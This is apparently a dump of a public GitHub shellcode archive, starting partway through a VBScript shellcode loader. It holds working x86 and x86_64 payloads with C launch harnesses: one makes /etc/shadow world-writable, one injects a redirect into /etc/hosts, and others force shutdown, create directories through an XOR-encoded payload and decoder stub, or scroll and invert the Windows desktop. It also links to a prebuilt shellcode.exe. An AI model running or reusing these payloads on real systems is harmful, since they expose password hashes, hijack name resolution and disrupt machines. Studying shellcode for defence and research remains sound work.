39 | DX.NumPut shellcode(i),scLocation,i 40 | Next 41 | 42 | thread = DX.CreateThread (0,0,scLocation,0,0) 43 | -------------------------------------------------------------------------------- /Hosts.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: Add map in /etc/hosts file - 110 bytes 3 | ; Date: 2014-10-29 4 | ; Platform: linux/x86_64 5 | ; Website: http://osandamalith.wordpress.com 6 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 7 | 8 | global _start 9 | section .text 10 | 11 | _start: 12 | ;open 13 | xor rax, rax 14 | add rax, 2 ; open syscall 15 | xor rdi, rdi 16 | xor rsi, rsi 17 | push rsi ; 0x00 18 | mov r8, 0x2f2f2f2f6374652f ; stsoh/ 19 | mov r10, 0x7374736f682f2f2f ; /cte/ 20 | push r10 21 | push r8 22 | add rdi, rsp 23 | xor rsi, rsi 24 | add si, 0x401 25 | syscall 26 | 27 | ;write 28 | xchg rax, rdi 29 | xor rax, rax 30 | add rax, 1 ; syscall for write 31 | jmp data 32 | 33 | write: 34 | pop rsi 35 | mov dl, 19 ; length in rdx 36 | syscall 37 | 38 | ;close 39 | xor rax, rax 40 | add rax, 3 41 | syscall 42 | 43 | ;exit 44 | xor rax, rax 45 | mov al, 60 46 | xor rdi, rdi 47 | syscall 48 | 49 | data: 50 | call write 51 | text db '127.1.1.1 google.lk' 52 | */ 53 | 54 | #include 55 | #include 56 | 57 | unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x02\x48" 58 | "\x31\xff\x48\x31\xf6\x56\x49\xb8" 59 | "\x2f\x65\x74\x63\x2f\x2f\x2f\x2f" 60 | "\x49\xba\x2f\x2f\x2f\x68\x6f\x73" 61 | "\x74\x73\x41\x52\x41\x50\x48\x01" 62 | "\xe7\x48\x31\xf6\x66\x81\xc6\x01" 63 | "\x04\x0f\x05\x48\x97\x48\x31\xc0" 64 | "\x48\x83\xc0\x01\xeb\x18\x5e\xb2" 65 | "\x13\x0f\x05\x48\x31\xc0\x48\x83" 66 | "\xc0\x03\x0f\x05\x48\x31\xc0\xb0" 67 | "\x3c\x48\x31\xff\x0f\x05\xe8\xe3" 68 | "\xff\xff\xff\x31\x32\x37\x2e\x31" 69 | "\x2e\x31\x2e\x31\x20\x67\x6f\x6f" 70 | "\x67\x6c\x65\x2e\x6c\x6b"; 71 | 72 | 73 | int 74 | main() { 75 | printf("Shellcode Length: %d\n", (int)strlen(code)); 76 | int (*ret)() = (int(*)())code; 77 | ret(); 78 | 79 | } 80 | /*EOF*/ 81 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Shellcodes 2 | ========== 3 | 4 | My Shellcode Archive 5 | -------------------------------------------------------------------------------- /VBShellCode Demo/shellcode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OsandaMalith/Shellcodes/b8b356c358812b02668f2d5780b5abfb99b86b9d/VBShellCode Demo/shellcode.exe -------------------------------------------------------------------------------- /chmod777.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes 3 | ; Platform: linux/x86 4 | ; Date: 2014-06-22 5 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 6 | 7 | section .text 8 | global _start 9 | 10 | _start: 11 | mov ebx, eax 12 | xor eax, ebx 13 | push dword eax 14 | mov esi, 0x563a1f3e 15 | add esi, 0x21354523 16 | mov dword [esp-4], esi 17 | mov dword [esp-8], 0x68732f2f 18 | mov dword [esp-12], 0x6374652f 19 | sub esp, 12 20 | mov ebx,esp 21 | push word 0x1ff 22 | pop cx 23 | mov al,0xf 24 | int 0x80 25 | 26 | */ 27 | 28 | #include 29 | #include 30 | 31 | unsigned char code[] = \ 32 | "\x89\xc3\x31\xd8\x50\xbe\x3e\x1f" 33 | "\x3a\x56\x81\xc6\x23\x45\x35\x21" 34 | "\x89\x74\x24\xfc\xc7\x44\x24\xf8" 35 | "\x2f\x2f\x73\x68\xc7\x44\x24\xf4" 36 | "\x2f\x65\x74\x63\x83\xec\x0c\x89" 37 | "\xe3\x66\x68\xff\x01\x66\x59\xb0" 38 | "\x0f\xcd\x80"; 39 | 40 | int 41 | main() { 42 | 43 | printf("Shellcode Length: %d\n", strlen(code)); 44 | int (*ret)() = (int(*)())code; 45 | ret(); 46 | 47 | return 0; 48 | -------------------------------------------------------------------------------- /desktopscroll.c: -------------------------------------------------------------------------------- 1 | # include 2 | # include 3 | # include 4 | # include 5 | 6 | /* 7 | * Title: Shellcode to scroll your desktop horizontally 8 | * Author: Osanda Malith Jayathissa (@OsandaMalith) 9 | * Website: https://osandamalith.com 10 | * This was strictly made for fun :) 11 | */ 12 | 13 | int main() { 14 | char *shellcode = 15 | "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x80\x03\x01\x01\x81\xf1\x01\x01" 16 | "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x06\x0f\x44\xc6\xaa" 17 | "\xe2\xf6\xe8\x06\x06\x06\x06\x5e\x8b\xfe\x81\xc6\x4e\x02\x06\x06" 18 | "\xb9\x03\x06\x06\x06\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83" 19 | "\xec\x30\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\x7c\x01\x06\x06\x8b" 20 | "\xf0\x68\x5a\x02\x06\x06\xff\xd6\x68\x67\x02\x06\x06\xff\xd6\x68" 21 | "\x71\x02\x06\x06\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\x5b\x01\x06\x06" 22 | "\xb9\x49\x67\xd2\xbe\x89\x45\xd0\xe8\x4e\x01\x06\x06\xb9\xdb\xda" 23 | "\xeb\xd0\x89\x45\xf8\xe8\x41\x01\x06\x06\xb9\x4c\x0c\x02\xae\x89" 24 | "\x45\xf4\xe8\x34\x01\x06\x06\xb9\xa7\x0b\x59\x08\x89\x45\xd4\xe8" 25 | "\x27\x01\x06\x06\xb9\xaa\xf7\xb4\x69\x89\x45\xe8\xe8\x1a\x01\x06" 26 | "\x06\xb9\xda\x7c\x54\xcb\x8b\xf8\xe8\x0e\x01\x06\x06\xb9\x13\xd4" 27 | "\x9b\xc3\x8b\xd8\xe8\x02\x01\x06\x06\xb9\xe2\x9d\x97\xbc\x89\x45" 28 | "\xf0\xe8\xf5\x06\x06\x06\xb9\x33\xd6\x41\xc3\x89\x45\xe4\xe8\xe8" 29 | "\x06\x06\x06\xb9\x0f\xa4\xbf\xd1\x89\x45\xe0\xe8\xdb\x06\x06\x06" 30 | "\xb9\x32\xe6\xd6\x1c\x89\x45\xd8\xe8\xce\x06\x06\x06\x6a\x06\x8b" 31 | "\xf0\xff\x55\xf8\x6a\x06\x89\x45\xec\xff\xd7\x6a\x01\x89\x45\xf8" 32 | "\xff\xd7\x8b\x4d\xf8\x8b\x7d\xec\x50\x03\xc9\x51\x57\x89\x45\xfc" 33 | "\xff\xd3\x8b\xd8\x57\x89\x5d\xec\xff\xd6\x8b\xf0\x53\x56\xff\x55" 34 | "\xf0\x8b\x5d\xf8\x68\x20\x06\xcc\x06\x89\x45\xdc\x33\xc0\x50\x50" 35 | "\x57\xff\x75\xfc\x53\x50\x50\x56\xff\x55\xf4\x68\x20\x06\xcc\x06" 36 | "\x33\xc0\x50\x50\x57\xff\x75\xfc\x53\x50\x53\x56\xff\x55\xf4\x68" 37 | "\x20\x06\xcc\x06\x33\xc0\x50\x53\x56\xff\x75\xfc\xff\x75\xf8\x50" 38 | "\x50\x57\xff\x55\xf4\x6a\x05\xff\x55\xe8\x83\xeb\x08\x79\xe0\x33" 39 | "\xdb\x53\x57\x6a\x0f\x53\xff\x55\xe4\xff\x75\xec\xff\x55\xe0\xff" 40 | "\x75\xdc\x56\xff\x55\xf0\x56\xff\x55\xd8\x57\x53\xff\x55\xd4\x53" 41 | "\xff\x55\xd0\x5f\x5e\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca" 42 | "\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01" 43 | "\x84\xc0\x75\xea\x8b\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec" 44 | "\x14\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x06\x06\x06\x89\x45\xfc" 45 | "\x8b\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf" 46 | "\xe8\xd2\xff\xff\xff\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46" 47 | "\x3c\x8b\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8" 48 | "\x96\xff\xff\xff\x8b\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89" 49 | "\x4d\xf0\x89\x45\xfc\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce" 50 | "\xe8\x75\xff\xff\xff\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc" 51 | "\x8b\x4d\xf0\x40\x89\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec" 52 | "\x75\x9c\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24" 53 | "\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04" 54 | "\x30\x03\xc6\xeb\xdf\x2b\x06\x06\x06\x32\x06\x06\x06\x39\x06\x06" 55 | "\x06\x6b\x65\x72\x6e\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x06\x67\x64" 56 | "\x69\x33\x32\x2e\x64\x6c\x6c\x06\x75\x73\x65\x72\x33\x32\x2e\x64" 57 | "\x6c\x6c\x06"; 58 | 59 | DWORD oldProtect; 60 | 61 | wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode)); 62 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); 63 | 64 | if (!ret) { 65 | fprintf(stderr, "%s", "Error Occured"); 66 | return EXIT_FAILURE; 67 | } 68 | 69 | ((void(*)(void))shellcode)(); 70 | 71 | VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); 72 | 73 | return EXIT_SUCCESS; 74 | } 75 | -------------------------------------------------------------------------------- /hosts.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global _start 3 | 4 | _start: 5 | 6 | jmp legit_start 7 | google db "127.1.1.1 google.lk" 8 | file db "/etc/hosts",0x00 9 | 10 | legit_start: 11 | 12 | ; open a file 13 | xor rax, rax 14 | add rax, 2 ; open syscall 15 | xor rdi, rdi 16 | lea rdi, [rel file] ; load relative addr of file 17 | xor rsi, rsi 18 | add si, 0x401 ; file perms 19 | syscall 20 | 21 | ; write 22 | xchg rax, rdi 23 | xor rax, rax 24 | add rax, 1 ; syscall for write 25 | lea rsi, [rel google] 26 | mov dl, 19 ; This is the length of the string. 27 | syscall 28 | 29 | ;close 30 | xor rax, rax 31 | add rax, 3 32 | syscall 33 | 34 | ;exit 35 | xor rax, rax 36 | mov al, 60 37 | xor rdi, rdi 38 | syscall 39 | -------------------------------------------------------------------------------- /invert.c: -------------------------------------------------------------------------------- 1 | # include 2 | # include 3 | # include 4 | # include 5 | 6 | /* 7 | * Title: Shellcode to Invert Colors in your Desktop 8 | * Author: Osanda Malith Jayathissa (@OsandaMalith) 9 | * Website: https://osandamalith.com 10 | * This was strictly made for fun :) 11 | */ 12 | 13 | int main() { 14 | char *shellcode = 15 | "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xce\x03\x02\x02\x81\xf1\x02\x02" 16 | "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa" 17 | "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x99\x01\x05\x05" 18 | "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83" 19 | "\xec\x10\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\xc7\x05\x05\x05\x8b" 20 | "\xf0\x68\xa5\x01\x05\x05\xff\xd6\x68\xb2\x01\x05\x05\xff\xd6\x68" 21 | "\xbc\x01\x05\x05\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xa6\x05\x05\x05" 22 | "\xb9\x49\x67\xd2\xbe\x89\x45\xf0\xe8\x99\x05\x05\x05\xb9\xdb\xda" 23 | "\xeb\xd0\x8b\xf0\xe8\x8d\x05\x05\x05\xb9\x4c\x0c\x02\xae\x89\x45" 24 | "\xfc\xe8\x80\x05\x05\x05\xb9\xa7\x0b\x59\x08\x89\x45\xf8\xe8\x73" 25 | "\x05\x05\x05\xb9\xaa\xf7\xb4\x69\x89\x45\xf4\xe8\x66\x05\x05\x05" 26 | "\x6a\x0a\x8b\xf8\x5b\x68\x09\x05\x55\x05\x6a\x05\x6a\x05\x6a\x05" 27 | "\xff\xd6\x50\x6a\x01\xff\xd7\x50\x6a\x05\xff\xd7\x50\x33\xc0\x50" 28 | "\x50\x50\xff\xd6\x50\xff\x55\xfc\x6a\x05\xff\xd6\x50\x6a\x05\xff" 29 | "\x55\xf8\x6a\x64\xff\x55\xf4\x4b\x75\xcb\x53\xff\x55\xf0\x5f\x5e" 30 | "\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe" 31 | "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b" 32 | "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89" 33 | "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40" 34 | "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff" 35 | "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78" 36 | "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b" 37 | "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc" 38 | "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff" 39 | "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89" 40 | "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f" 41 | "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7" 42 | "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf" 43 | "\x2b\x05\x05\x05\x32\x05\x05\x05\x39\x05\x05\x05\x6b\x65\x72\x6e" 44 | "\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x05\x67\x64\x69\x33\x32\x2e\x64" 45 | "\x6c\x6c\x05\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x05"; 46 | 47 | DWORD oldProtect; 48 | 49 | wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode)); 50 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect); 51 | 52 | if (!ret) { 53 | fprintf(stderr, "%s", "Error Occured"); 54 | return EXIT_FAILURE; 55 | } 56 | 57 | ((void(*)(void))shellcode)(); 58 | 59 | VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect); 60 | 61 | return EXIT_SUCCESS; 62 | } 63 | -------------------------------------------------------------------------------- /makedir.asm: -------------------------------------------------------------------------------- 1 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 2 | ; This makes the syscall 39 and creates a new directory by the 'Osanda' with the chmod 755 3 | 4 | section .text 5 | global _start 6 | 7 | _start: 8 | 9 | jmp short call_dir 10 | 11 | shellcode: 12 | xor eax, eax 13 | xor ebx, ebx 14 | xor edx, edx 15 | xor ecx, ecx 16 | mov al, 0x27 17 | pop ebx 18 | mov cx, 0x1ed 19 | int 0x80 20 | 21 | ; exit 22 | xor eax, eax 23 | mov al, 0x1 24 | xor ebx,ebx 25 | int 0x80 26 | call_dir: 27 | call shellcode 28 | msg: db 0x4f,0x73,0x61,0x6e,0x64,0x61 29 | -------------------------------------------------------------------------------- /makedir_decode.asm: -------------------------------------------------------------------------------- 1 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 2 | ; This is the XOR decoder stub 3 | 4 | section .text 5 | global _start 6 | 7 | _start: 8 | 9 | jmp short call_decoder 10 | 11 | decoder: 12 | pop esi 13 | 14 | 15 | decode: 16 | xor byte [esi], 0xAA 17 | jz Shellcode 18 | inc esi 19 | jmp short decode 20 | 21 | 22 | call_decoder: 23 | 24 | call decoder 25 | Shellcode: db 0x41,0xb3,0x9b,0x6a,0x9b,0x71,0x9b,0x78,0x9b,0x63,0x1a,0x8d,0xf1,0xcc,0x13,0x47,0xab,0x67,0x2a,0x9b,0x6a,0x1a,0xab,0x9b,0x71,0x67,0x2a,0x42,0x48,0x55,0x55,0x55,0xe5,0xd9,0xcb,0xc4,0xce,0xcb, 0xaa 26 | -------------------------------------------------------------------------------- /mkdir.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 3 | ; This makes the syscall 39 and creates a new directory by the 'Osanda' with the chmod 755 4 | 5 | section .text 6 | global _start 7 | 8 | _start: 9 | 10 | jmp short call_shellcode 11 | 12 | shellcode: 13 | xor eax, eax 14 | xor ebx, ebx 15 | xor edx, edx 16 | xor ecx, ecx 17 | mov al, 0x27 18 | pop ebx 19 | mov cx, 0x1ed 20 | int 0x80 21 | 22 | ; exit 23 | xor eax, eax 24 | mov al, 0x1 25 | xor ebx,ebx 26 | int 0x80 27 | call_shellcode: 28 | call shellcode 29 | msg: db 0x4f,0x73,0x61,0x6e,0x64,0x61 30 | 31 | 32 | 33 | */ 34 | 35 | /* 36 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 37 | ; This is XOR decoder stub 38 | 39 | section .text 40 | global _start 41 | 42 | _start: 43 | 44 | jmp short call_decoder 45 | 46 | decoder: 47 | pop esi 48 | 49 | 50 | decode: 51 | xor byte [esi], 0xAA 52 | jz Shellcode 53 | inc esi 54 | jmp short decode 55 | 56 | 57 | call_decoder: 58 | 59 | call decoder 60 | Shellcode: db 0x41,0xb3,0x9b,0x6a,0x9b,0x71,0x9b,0x78,0x9b,0x63,0x1a,0x8d,0xf1,0xcc,0x13,0x47,0xab,0x67,0x2a,0x9b,0x6a,0x1a,0xab,0x9b,0x71,0x67,0x2a,0x42,0x48,0x55,0x55,0x55,0xe5,0xd9,0xcb,0xc4,0xce,0xcb, 0xaa 61 | 62 | */ 63 | 64 | /* Author : Osanda Malith Jayathissa (@OsandaMalith) 65 | * gcc -fno-stack-protector -z execstack -o mkdir mkdir.c 66 | */ 67 | 68 | #include 69 | #include 70 | 71 | unsigned char code[] = \ 72 | "\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x41\xb3\x9b\x6a\x9b\x71\x9b\x78\x9b\x63\x1a\x8d\xf1\xcc\x13\x47\xab\x67\x2a\x9b\x6a\x1a\xab\x9b\x71\x67\x2a\x42\x48\x55\x55\x55\xe5\xd9\xcb\xc4\xce\xcb\xaa"; 73 | 74 | main() 75 | { 76 | 77 | printf("Shellcode Length: %d\n", strlen(code)); 78 | 79 | int (*ret)() = (int(*)())code; 80 | 81 | ret(); 82 | 83 | } 84 | -------------------------------------------------------------------------------- /shutdown_x86.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: shutdown -h now Shellcode - 56 bytes 3 | ; Date: 2014-06-27 4 | ; Platform: linux/x86 5 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 6 | 7 | Disassembly of section .text: 8 | 9 | 08048060 <_start>: 10 | 8048060: 31 c0 xor eax,eax 11 | 8048062: 31 d2 xor edx,edx 12 | 8048064: 50 push eax 13 | 8048065: 66 68 2d 68 pushw 0x682d 14 | 8048069: 89 e7 mov edi,esp 15 | 804806b: 50 push eax 16 | 804806c: 6a 6e push 0x6e 17 | 804806e: 66 c7 44 24 01 6f 77 mov WORD PTR [esp+0x1],0x776f 18 | 8048075: 89 e7 mov edi,esp 19 | 8048077: 50 push eax 20 | 8048078: 68 64 6f 77 6e push 0x6e776f64 21 | 804807d: 68 73 68 75 74 push 0x74756873 22 | 8048082: 68 6e 2f 2f 2f push 0x2f2f2f6e 23 | 8048087: 68 2f 73 62 69 push 0x6962732f 24 | 804808c: 89 e3 mov ebx,esp 25 | 804808e: 52 push edx 26 | 804808f: 56 push esi 27 | 8048090: 57 push edi 28 | 8048091: 53 push ebx 29 | 8048092: 89 e1 mov ecx,esp 30 | 8048094: b0 0b mov al,0xb 31 | 8048096: cd 80 int 0x80 32 | 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | unsigned char code[] = "\x31\xc0\x31\xd2\x50\x66\x68\x2d" 39 | "\x68\x89\xe7\x50\x6a\x6e\x66\xc7" 40 | "\x44\x24\x01\x6f\x77\x89\xe7\x50" 41 | "\x68\x64\x6f\x77\x6e\x68\x73\x68" 42 | "\x75\x74\x68\x6e\x2f\x2f\x2f\x68" 43 | "\x2f\x73\x62\x69\x89\xe3\x52\x56" 44 | "\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 45 | 46 | int 47 | main() { 48 | 49 | printf("Shellcode Length: %d\n", (int)strlen(code)); 50 | int (*ret)() = (int(*)())code; 51 | ret(); 52 | 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /shutdown_x86_64.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: shutdown -h now x86_64 Shellcode - 65 bytes 3 | ; Platform: linux/x86_64 4 | ; Date: 2014-06-27 5 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 6 | 7 | section .text 8 | 9 | global _start 10 | 11 | _start: 12 | 13 | xor rax, rax 14 | xor rdx, rdx 15 | 16 | push rax 17 | push byte 0x77 18 | push word 0x6f6e ; now 19 | mov rbx, rsp 20 | 21 | push rax 22 | push word 0x682d ;-h 23 | mov rcx, rsp 24 | 25 | push rax 26 | mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown 27 | mov r10, 0x6e776f6474756873 28 | push r10 29 | push r8 30 | mov rdi, rsp 31 | 32 | push rdx 33 | push rbx 34 | push rcx 35 | push rdi 36 | mov rsi, rsp 37 | 38 | add rax, 59 39 | syscall 40 | 41 | */ 42 | 43 | #include 44 | #include 45 | 46 | unsigned char code[] = "\x48\x31\xc0\x48\x31\xd2\x50\x6a" 47 | "\x77\x66\x68\x6e\x6f\x48\x89\xe3" 48 | "\x50\x66\x68\x2d\x68\x48\x89\xe1" 49 | "\x50\x49\xb8\x2f\x73\x62\x69\x6e" 50 | "\x2f\x2f\x2f\x49\xba\x73\x68\x75" 51 | "\x74\x64\x6f\x77\x6e\x41\x52\x41" 52 | "\x50\x48\x89\xe7\x52\x53\x51\x57" 53 | "\x48\x89\xe6\x48\x83\xc0\x3b\x0f" 54 | "\x05"; 55 | 56 | int 57 | main() { 58 | 59 | printf("Shellcode Length: %d\n", (int)strlen(code)); 60 | int (*ret)() = (int(*)())code; 61 | ret(); 62 | 63 | return 0; 64 | } 65 | -------------------------------------------------------------------------------- /vhscroll.c: -------------------------------------------------------------------------------- 1 | # include 2 | # include 3 | # include 4 | # include 5 | 6 | /* 7 | * Title: Shellcode to scroll your desktop vertically and horizontally infinitely 8 | * Author: Osanda Malith Jayathissa (@OsandaMalith) 9 | * Website: https://osandamalith.com 10 | * This was strictly made for fun :) 11 | */ 12 | 13 | int main() { 14 | char *shellcode = 15 | "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x24\x02\x01\x01\x81\xf1\x01\x01" 16 | "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x06\x0f\x44\xc6\xaa" 17 | "\xe2\xf6\xe8\x06\x06\x06\x06\x5e\x8b\xfe\x81\xc6\xf2\x02\x06\x06" 18 | "\xb9\x03\x06\x06\x06\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83" 19 | "\xec\x3c\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\x20\x02\x06\x06\x8b" 20 | "\xf0\x68\xfe\x02\x06\x06\xff\xd6\x68\x0b\x03\x06\x06\xff\xd6\x68" 21 | "\x15\x03\x06\x06\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xff\x01\x06\x06" 22 | "\xb9\x49\x67\xd2\xbe\xe8\xf5\x01\x06\x06\x8b\xd8\xb9\xdb\xda\xeb" 23 | "\xd0\x89\x5d\xcc\xe8\xe6\x01\x06\x06\xb9\x4c\x0c\x02\xae\x89\x45" 24 | "\xfc\xe8\xd9\x01\x06\x06\xb9\xa7\x0b\x59\x08\x89\x45\xc4\xe8\xcc" 25 | "\x01\x06\x06\xb9\xaa\xf7\xb4\x69\x89\x45\xe0\xe8\xbf\x01\x06\x06" 26 | "\x8b\xf0\xb9\xda\x7c\x54\xcb\x89\x75\xd0\xe8\xb0\x01\x06\x06\xb9" 27 | "\x13\xd4\x9b\xc3\x89\x45\xe8\xe8\xa3\x01\x06\x06\xb9\xe2\x9d\x97" 28 | "\xbc\x89\x45\xf8\xe8\x96\x01\x06\x06\xb9\x33\xd6\x41\xc3\x89\x45" 29 | "\xdc\xe8\x89\x01\x06\x06\xb9\x0f\xa4\xbf\xd1\x89\x45\xd8\xe8\x7c" 30 | "\x01\x06\x06\xb9\x32\xe6\xd6\x1c\x89\x45\xd4\xe8\x6f\x01\x06\x06" 31 | "\x89\x45\xe4\x6a\x06\xff\xd3\x6a\x06\x8b\xf8\xff\xd6\x8b\xd8\x6a" 32 | "\x01\x89\x5d\xf4\xff\xd6\x8b\xf0\x8d\x0c\x36\x51\x53\x57\xff\x55" 33 | "\xe8\x57\x89\x45\xec\xff\x55\xe4\xff\x75\xec\x8b\xd8\x53\xff\x55" 34 | "\xf8\x68\x20\x06\xcc\x06\x89\x45\xc8\x33\xc0\x50\x50\x57\x56\xff" 35 | "\x75\xf4\x50\x50\x53\xff\x55\xfc\x68\x20\x06\xcc\x06\x33\xc0\x50" 36 | "\x50\x57\x56\xff\x75\xf4\x56\x50\x53\xff\x55\xfc\x8b\xc6\x89\x75" 37 | "\xf0\x68\x20\x06\xcc\x06\x50\x33\xc0\x50\x53\x56\xff\x75\xf4\x50" 38 | "\x50\x57\xff\x55\xfc\x6a\x05\xff\x55\xe0\x8b\x45\xf0\x83\xe8\x05" 39 | "\x89\x45\xf0\x79\xdc\x33\xf6\x56\x57\x6a\x0f\x56\xff\x55\xdc\xff" 40 | "\x75\xec\xff\x55\xd8\xff\x75\xc8\x53\xff\x55\xf8\x53\xff\x55\xd4" 41 | "\x56\xff\x55\xcc\x8b\x7d\xd0\x6a\x06\x8b\xf0\xff\xd7\x6a\x01\x8b" 42 | "\xd8\xff\xd7\x50\x8d\x0c\x1b\x51\x56\x89\x45\xf4\xff\x55\xe8\x56" 43 | "\x89\x45\xf0\xff\x55\xe4\xff\x75\xf0\x8b\xf8\x57\xff\x55\xf8\x68" 44 | "\x20\x06\xcc\x06\x89\x45\xc8\x33\xc0\x50\x50\x56\xff\x75\xf4\x53" 45 | "\x50\x50\x57\xff\x55\xfc\x68\x20\x06\xcc\x06\x33\xc0\x50\x50\x56" 46 | "\xff\x75\xf4\x53\x50\x53\x57\xff\x55\xfc\x8b\xc3\x89\x5d\xec\x68" 47 | "\x20\x06\xcc\x06\x33\xc9\x51\x50\x57\xff\x75\xf4\x53\x51\x51\x56" 48 | "\xff\x55\xfc\x6a\x05\xff\x55\xe0\x8b\x45\xec\x83\xe8\x08\x89\x45" 49 | "\xec\x79\xdc\x33\xdb\x53\x56\x6a\x0f\x53\xff\x55\xdc\xff\x75\xf0" 50 | "\xff\x55\xd8\xff\x75\xc8\x57\xff\x55\xf8\x57\xff\x55\xd4\x56\x53" 51 | "\xff\x55\xc4\x8b\x75\xd0\x8b\x5d\xcc\xe9\xb5\xfe\xff\xff\x33\xd2" 52 | "\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03" 53 | "\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x8d\x41\xf8\xc3\x55" 54 | "\x8b\xec\x83\xec\x14\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x06\x06" 55 | "\x06\x89\x45\xfc\x8b\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x89\x45\xec" 56 | "\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff\x8b\x70\x18\x8b\x3f\x85\xf6" 57 | "\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33" 58 | "\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b\x4c\x33\x20\x89\x45\xf8\x33" 59 | "\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc\x39\x44\x33\x18\x76\x22\x8b" 60 | "\x0c\x81\x03\xce\xe8\x75\xff\xff\xff\x03\x45\xf8\x39\x45\xf4\x74" 61 | "\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89\x45\xfc\x3b\x44\x33\x18\x72" 62 | 